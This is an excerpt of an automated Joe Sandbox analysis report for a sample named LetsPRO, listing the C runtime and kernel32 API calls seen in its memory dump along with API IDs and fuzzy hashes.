                                        • _memset.LIBCMT(?,00000000,?,F3B6147F,?,?), ref: 6C940265
                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,?,?,F3B6147F,?,?), ref: 6C9402B5
                                        • GetLastError.KERNEL32(?,?,?,F3B6147F,?,?), ref: 6C9402C5
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,F3B6147F,?,?), ref: 6C9402DE
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,?,?,F3B6147F,?,?), ref: 6C9402ED
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,?,?,?,F3B6147F,?,?), ref: 6C9402F4
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,?,F3B6147F,?,?), ref: 6C940321
                                        • _memset.LIBCMT(00000000,00000000,00000000,?,?,?,F3B6147F,?,?), ref: 6C940332
                                          • Part of subcall function 6C941741: _memset.LIBCMT(?,00000000,0000003E,00000000,00000000), ref: 6C941760
                                        Similarity
                                        • API ID: _memset$??2@$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency@@Count@CreateErrorExceptionLastNodeProcessorSemaphoreThrowmalloc
                                        • String ID:
                                        • API String ID: 1488694034-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,6C90CCCF,?,?,?), ref: 6C90CC62
                                        • _errno.MSVCR100(?,?,?,?,?,?,6C90CCCF,?,?,?), ref: 6C92C897
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6C90CCCF,?,?,?), ref: 6C92C8A1
                                        • ___crtLCMapStringW.LIBCMT(?,00000200,?,000000FF,00000000,00000000,?,?,?,?,?,?,6C90CCCF,?,?,?), ref: 6C92C8BE
                                        • _errno.MSVCR100(?,?,6C90CCCF,?,?,?), ref: 6C92C8CF
                                        • _errno.MSVCR100(?,?,6C90CCCF,?,?,?), ref: 6C92C8DA
                                        • _errno.MSVCR100(?,?,6C90CCCF,?,?,?), ref: 6C92C8F0
                                        • malloc.MSVCR100(00000008,?,?,6C90CCCF,?,?,?), ref: 6C92C928
                                        • _errno.MSVCR100(?,?,6C90CCCF,?,?,?), ref: 6C92C944
                                        • ___crtLCMapStringW.LIBCMT(?,00000200,?,000000FF,00000000,00000000,?,?,6C90CCCF,?,?,?), ref: 6C92C95F
                                        • wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,6C90CCCF,?,?,?), ref: 6C92C970
                                        • _freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,6C90CCCF,?,?,?), ref: 6C92C989
                                        Similarity
                                        • API ID: _errno$String___crt$_freea_s_invalid_parameter_noinfomallocwcscpy_swcsnlen
                                        • String ID:
                                        • API String ID: 4082481270-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,6C9038A3,?,?,?), ref: 6C903829
                                        • _errno.MSVCR100(?,?,?,?,?,?,6C9038A3,?,?,?), ref: 6C92C5EC
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6C9038A3,?,?,?), ref: 6C92C5F6
                                        • ___crtLCMapStringW.LIBCMT(?,00000100,?,000000FF,00000000,00000000,?,?,?,?,?,?,6C9038A3,?,?,?), ref: 6C92C613
                                        • _errno.MSVCR100(?,?,6C9038A3,?,?,?), ref: 6C92C624
                                        • _errno.MSVCR100(?,?,6C9038A3,?,?,?), ref: 6C92C62F
                                        • _errno.MSVCR100(?,?,6C9038A3,?,?,?), ref: 6C92C645
                                        • malloc.MSVCR100(00000008,?,?,6C9038A3,?,?,?), ref: 6C92C67D
                                        • _errno.MSVCR100(?,?,6C9038A3,?,?,?), ref: 6C92C699
                                        • ___crtLCMapStringW.LIBCMT(?,00000100,?,000000FF,00000000,00000000,?,?,6C9038A3,?,?,?), ref: 6C92C6B4
                                        • wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,6C9038A3,?,?,?), ref: 6C92C6C5
                                        • _freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,6C9038A3,?,?,?), ref: 6C92C6DE
                                        Similarity
                                        • API ID: _errno$String___crt$_freea_s_invalid_parameter_noinfomallocwcscpy_swcsnlen
                                        • String ID:
                                        • API String ID: 4082481270-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _malloc_crt.MSVCR100(00000355,00000000,6C905289,00000001,00000000,00000000), ref: 6C904DE4
                                          • Part of subcall function 6C900B61: malloc.MSVCR100(00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C900B6D
                                          • Part of subcall function 6C904D96: strcat_s.MSVCR100(6C906E68,6C906E47,6C906E58,?,00000083,00000083,?,6C906E5C,6C906E47,6C906E68,00000002,6C906E68,6C906E47,?,00000000,00000000), ref: 6C904DB5
                                        • strcat_s.MSVCR100(00000004,00000351,6C904D94,?,?,?,?,?,00000000,6C905289,00000001,00000000), ref: 6C904E31
                                        • strcmp.MSVCR100(00000000,00000010,?,?,?,?,?,?,?,?,00000000,6C905289,00000001,00000000), ref: 6C904E4E
                                        • free.MSVCR100(6C905289,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C904E95
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6C905289,00000001), ref: 6C930C41
                                        • free.MSVCR100(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6C905289), ref: 6C930C49
                                        Similarity
                                        • API ID: freestrcat_s$__invoke_watson_malloc_crtmallocstrcmp
                                        • String ID:
                                        • API String ID: 1358975119-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _lock.MSVCR100(0000000D,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C902887
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C902899
                                        • _lock.MSVCR100(0000000C,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C9028B5
                                        • free.MSVCR100(00000000,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C9028E9
                                        • free.MSVCR100(00000000), ref: 6C927655
                                        • free.MSVCR100(?,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C927661
                                        • free.MSVCR100(?,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C92766D
                                        • free.MSVCR100(?,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C927679
                                        • free.MSVCR100(?,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C927685
                                        • free.MSVCR100(?,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C927691
                                        • free.MSVCR100(?,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C92769D
                                        • free.MSVCR100(?,6C9028F8,00000008,6C902982,00000000,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C9276A9
                                        • free.MSVCR100(?,?,6C9029A6,00000000,6C901E10,00000008,6C901E46,00000001,?), ref: 6C9276B5
                                        Similarity
                                        • API ID: free$_lock$CriticalDecrementEnterInterlockedSection
                                        • String ID:
                                        • API String ID: 3254847666-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetFullPathNameA.KERNEL32(?,?,00000000,?), ref: 6C9126AC
                                        • GetFullPathNameA.KERNEL32(?,00000000,00000000,00000000), ref: 6C927A98
                                        • GetLastError.KERNEL32 ref: 6C927A9E
                                        • __dosmaperr.LIBCMT(00000000), ref: 6C927AA5
                                        • _errno.MSVCR100 ref: 6C927ABF
                                        • calloc.MSVCR100(?,00000001), ref: 6C927AD4
                                        • _errno.MSVCR100 ref: 6C927AE5
                                        • _errno.MSVCR100 ref: 6C927AF2
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C927AFD
                                        • free.MSVCR100(00000000), ref: 6C927B0B
                                        • _errno.MSVCR100 ref: 6C927B11
                                        • free.MSVCR100(00000000), ref: 6C927B28
                                        • _getcwd.MSVCR100(?,?), ref: 6C927B39
                                        Similarity
                                        • API ID: _errno$FullNamePathfree$ErrorLast__dosmaperr_getcwd_invalid_parameter_noinfocalloc
                                        • String ID:
                                        • API String ID: 4002649621-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6C903A42
                                        • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000), ref: 6C927B81
                                        • GetLastError.KERNEL32 ref: 6C927B87
                                        • __dosmaperr.LIBCMT(00000000), ref: 6C927B8E
                                        • _errno.MSVCR100 ref: 6C927BAB
                                        • calloc.MSVCR100(?,00000002), ref: 6C927BC0
                                        • _errno.MSVCR100 ref: 6C927BD1
                                        • _errno.MSVCR100 ref: 6C927BDE
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C927BE9
                                        • free.MSVCR100(00000000), ref: 6C927BF7
                                        • _errno.MSVCR100 ref: 6C927BFD
                                        • free.MSVCR100(00000000), ref: 6C927C14
                                        • _wgetcwd.MSVCR100(?,?), ref: 6C927C25
                                        Similarity
                                        • API ID: _errno$FullNamePathfree$ErrorLast__dosmaperr_invalid_parameter_noinfo_wgetcwdcalloc
                                        • String ID:
                                        • API String ID: 3145916893-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(?,?,00000016,?,0000002D,00000000,000000FF,?,?,?,?,?,?,?,?,000000A3), ref: 6C980117
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,00000016,?,0000002D,00000000,000000FF,?,?,?,?,?,?,?,?,000000A3), ref: 6C980121
                                        • _errno.MSVCR100(?,?,00000016,?,0000002D,00000000,000000FF,?,?,?,?,?,?,?,?,000000A3), ref: 6C980152
                                        • __shift.LIBCMT ref: 6C98017A
                                        • strcpy_s.MSVCR100(?,000000FF,e+000,?,?,?,00000016,?), ref: 6C9801CE
                                        • _memmove.LIBCMT(?,0000000C,00000003,?,00000016,?), ref: 6C980232
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,00000016,?), ref: 6C980255
                                        • __fltout2.LIBCMT ref: 6C980291
                                          • Part of subcall function 6C97FF57: ___dtold.LIBCMT ref: 6C97FF7D
                                          • Part of subcall function 6C97FF57: _$I10_OUTPUT.LIBCMT(?,?,00000016,?,?,?,6C980296,00000000,?,?,000000FF,00000016,?,?,000000A3,?), ref: 6C97FF98
                                          • Part of subcall function 6C97FF57: strcpy_s.MSVCR100(6C980296,?,?,?,?,00000016,?,?,?,6C980296,00000000,?,?,000000FF,00000016,?), ref: 6C97FFB8
                                        • _errno.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6C98029D
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6C9802A4
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __fptostr.LIBCMT ref: 6C9802EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfostrcpy_s$I10____dtold__fltout2__fptostr__invoke_watson__shift_invalid_parameter_memmove
                                        • String ID: e+000
                                        • API String ID: 2464188683-1027065040
                                        • Opcode ID: 33a2f78a568c09d514cb430d37ccfb8ee58d4980a159468e13ff445eef6cebf1
                                        • Instruction ID: 52856353cb5f23b0652cdcc1a5f3279bc96c04fd253aae5c5a1827c65038fa57
                                        • Opcode Fuzzy Hash: 33a2f78a568c09d514cb430d37ccfb8ee58d4980a159468e13ff445eef6cebf1
                                        • Instruction Fuzzy Hash: F25125316072C99FDB118F78C8806DE7BB4AF16328F1899ADE8668BA91D770DA44C750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        • `non-type-template-parameter, xrefs: 6C92D16F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: NameName::
                                        • String ID: `non-type-template-parameter
                                        • API String ID: 1333004437-4247534891
                                        • Opcode ID: 8e4177382a90a0cae4acce541db948e03a7a39c513abfb52af9ad26d5f6a9a50
                                        • Instruction ID: a5c28f78bdf771559d21cc7bd084ce9ad2267bf04fcb89af9ddbe6eed48a70ad
                                        • Opcode Fuzzy Hash: 8e4177382a90a0cae4acce541db948e03a7a39c513abfb52af9ad26d5f6a9a50
                                        • Instruction Fuzzy Hash: EE4119727156449FDB08CFA8C840AE97BB9EF67748F14806DD4C48BB56E730D946C790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _getptd$MatchType
                                        • String ID: MOC$RCC$csm$csm
                                        • API String ID: 965401092-1441736206
                                        • Opcode ID: 9d7f20d049caab8e3071f69df1ae2bb5cae32c8e1f2f3ba329a33aeb3f5daaa1
                                        • Instruction ID: 6909f7391212fa8f3342aa8f01ac52a78b5ce0a13652d8a94a3dc4c9b8631e7c
                                        • Opcode Fuzzy Hash: 9d7f20d049caab8e3071f69df1ae2bb5cae32c8e1f2f3ba329a33aeb3f5daaa1
                                        • Instruction Fuzzy Hash: 1731F331A096088FEB20DF69C480BA973FCAF1034AF29491AD899C7E51C738D548DB96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C90BEED
                                        • _malloc_crt.MSVCR100(00000054), ref: 6C90BF4A
                                        • __ExceptionPtr::__ExceptionPtr.LIBCMT ref: 6C90BF69
                                        • _Ptr_base.LIBCMT ref: 6C90BF92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Exception$H_prolog3_catchPtr::__Ptr_base_malloc_crt
                                        • String ID: bad allocation$csm
                                        • API String ID: 458220297-2003371537
                                        • Opcode ID: 152d557ce9e6c2b65eb5dc99a418d6d888b74977786f7a5bb3a50bab086671bd
                                        • Instruction ID: efa799e6f9cd407bc79f8da310fd37b6ad20445b1c2a72e3d5ba8b77bdfaa75b
                                        • Opcode Fuzzy Hash: 152d557ce9e6c2b65eb5dc99a418d6d888b74977786f7a5bb3a50bab086671bd
                                        • Instruction Fuzzy Hash: 25316DB1E05249DECB01DFA9D5806EEFBF8AF64708F24404EE545B7B40D774CA498BA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumber,?,?,?,6C93BEC7), ref: 6C93BC5C
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C93BC63
                                        • GetLastError.KERNEL32(?,?,?,6C93BEC7), ref: 6C93BC6D
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,6C93BEC7), ref: 6C93BC85
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,?,?,6C93BEC7), ref: 6C93BC93
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumberEx,?,?,?,6C93BEC7), ref: 6C93BCB7
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C93BCBE
                                        • GetLastError.KERNEL32(?,?,?,6C93BEC7), ref: 6C93BCC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AddressErrorHandleLastModuleProc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow
                                        • String ID: GetCurrentProcessorNumber$GetCurrentProcessorNumberEx$kernel32.dll
                                        • API String ID: 1995267393-690119961
                                        • Opcode ID: 72352682e35b0680599b97409c1441e3ef1afd41c1cf6b85245ff607d5f20eee
                                        • Instruction ID: 29b0334a782569ed97fe465c3d2450362279527200fe6284d3b78c1c46d2a469
                                        • Opcode Fuzzy Hash: 72352682e35b0680599b97409c1441e3ef1afd41c1cf6b85245ff607d5f20eee
                                        • Instruction Fuzzy Hash: 7C0165B1B045659BCB349BB99849A5E37BCBFD628C3106926E02AD2900DF24D404E69A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __forcdecpt_l_isleadbyte_l_mbtowc_l_strlen
                                        • String ID: $g
                                        • API String ID: 3157115575-3845294767
                                        • Opcode ID: 98cc41de6570cab42dad13a61f1dffe63dbef3d998d08679d917aa1031e87579
                                        • Instruction ID: a5423faca75920af25a953aed7d6819c58b359bf59f33ec7b8e99f7f77183fde
                                        • Opcode Fuzzy Hash: 98cc41de6570cab42dad13a61f1dffe63dbef3d998d08679d917aa1031e87579
                                        • Instruction Fuzzy Hash: A4226BF1A05629CADB608F288D84BD8B7B8BB45318F1482EDD718A7A41D770DAC5CF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6C9408F9
                                        • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 6C9408FF
                                        • DuplicateHandle.KERNEL32(00000000), ref: 6C940902
                                        • GetLastError.KERNEL32 ref: 6C94090C
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C940924
                                        • _CxxThrowException.MSVCR100(6C933918,6C9A0D0C,?), ref: 6C940932
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C,6C933918,6C9A0D0C,?), ref: 6C940939
                                        • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100(6C933918,6C9A0D0C,?), ref: 6C94094C
                                        • std::exception::exception.LIBCMT(?), ref: 6C94099E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentProcess$??2@AcquireConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency@@DuplicateErrorExceptionHandleLastLock@details@ReaderThrowWrite@_Writerstd::exception::exception
                                        • String ID: eventObject
                                        • API String ID: 1946344800-1680012138
                                        • Opcode ID: 0c5c5c5396a01bd63ac69890b32d7b40504829eba3ce5ee14c6f24a3e3d79505
                                        • Instruction ID: 67d811121fbc8f3dc570dfd082d3c2894bd0e4a32402819f80742d459f489aaf
                                        • Opcode Fuzzy Hash: 0c5c5c5396a01bd63ac69890b32d7b40504829eba3ce5ee14c6f24a3e3d79505
                                        • Instruction Fuzzy Hash: 99316172600215EFDB10CFA8C980ADABBF8FF68354B10952AE469D7B50D770E915CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: NameName::operator+
                                        • String ID: cli::array<$cli::pin_ptr<$void$void
                                        • API String ID: 1360548761-456688812
                                        • Opcode ID: 55943b8dd1f17d65f40effbabc66e22ecc4b0fe99b5c5483ce13df03e9a06b8f
                                        • Instruction ID: 08cdd0fed743e6ad0c8f56918ea1357ad6a36d34c16d883e26c054fa29f62ad2
                                        • Opcode Fuzzy Hash: 55943b8dd1f17d65f40effbabc66e22ecc4b0fe99b5c5483ce13df03e9a06b8f
                                        • Instruction Fuzzy Hash: A5218072A15209EFDF05CF54D840DEE3BB9EF55718F00805AE8589BB54EB34EA44CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C95EE99
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C95EEA3
                                        • _strnset_s.MSVCR100(?,?,?,?,?), ref: 6C95EECC
                                        • _ismbblead_l.MSVCR100(?,?,?), ref: 6C95EF0A
                                        • _ismbblead_l.MSVCR100(?,?,?), ref: 6C95EF36
                                        • _errno.MSVCR100(?), ref: 6C95EF47
                                        • _ismbblead_l.MSVCR100(?,?,?), ref: 6C95EF81
                                        • _ismbblead_l.MSVCR100(?,?,?), ref: 6C95EFA8
                                        • _ismbblead_l.MSVCR100(?,?,?), ref: 6C95EFEB
                                        • _errno.MSVCR100(?), ref: 6C95F042
                                        • _invalid_parameter_noinfo.MSVCR100(?), ref: 6C95F04C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _ismbblead_l$_errno$_invalid_parameter_noinfo$_strnset_s
                                        • String ID:
                                        • API String ID: 1238685693-0
                                        • Opcode ID: 139f850cf3db0c2d70c5424d3f0e1f9cd43d2a4108647a5875e8606264ab0931
                                        • Instruction ID: 212c96cc8d2852df74d8374dbe15686d544184e8df9b7cc1d15284c2cc0e75ff
                                        • Opcode Fuzzy Hash: 139f850cf3db0c2d70c5424d3f0e1f9cd43d2a4108647a5875e8606264ab0931
                                        • Instruction Fuzzy Hash: 6171B37180928ADFDF10CFA4D4505EDBBB8AF0531CF98409EE8A066A41D73BC1A5CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • InterlockedDecrement.KERNEL32(?), ref: 6C9086CB
                                        • free.MSVCR100(?), ref: 6C9086D7
                                        • free.MSVCR100(?,?), ref: 6C9086E2
                                        • _calloc_crt.MSVCR100(00000001,00000050), ref: 6C9094E2
                                        • _malloc_crt.MSVCR100(00000004), ref: 6C909502
                                          • Part of subcall function 6C900B61: malloc.MSVCR100(00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C900B6D
                                        • _malloc_crt.MSVCR100(00000004), ref: 6C909525
                                        • free.MSVCR100(00000000), ref: 6C931701
                                        • free.MSVCR100(00000000), ref: 6C93170D
                                        • free.MSVCR100(?,00000000), ref: 6C931715
                                        • ___free_lconv_num.LIBCMT ref: 6C931724
                                          • Part of subcall function 6C9088CA: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6C908914
                                          • Part of subcall function 6C9088CA: _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6C908923
                                          • Part of subcall function 6C9088CA: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6C90893C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
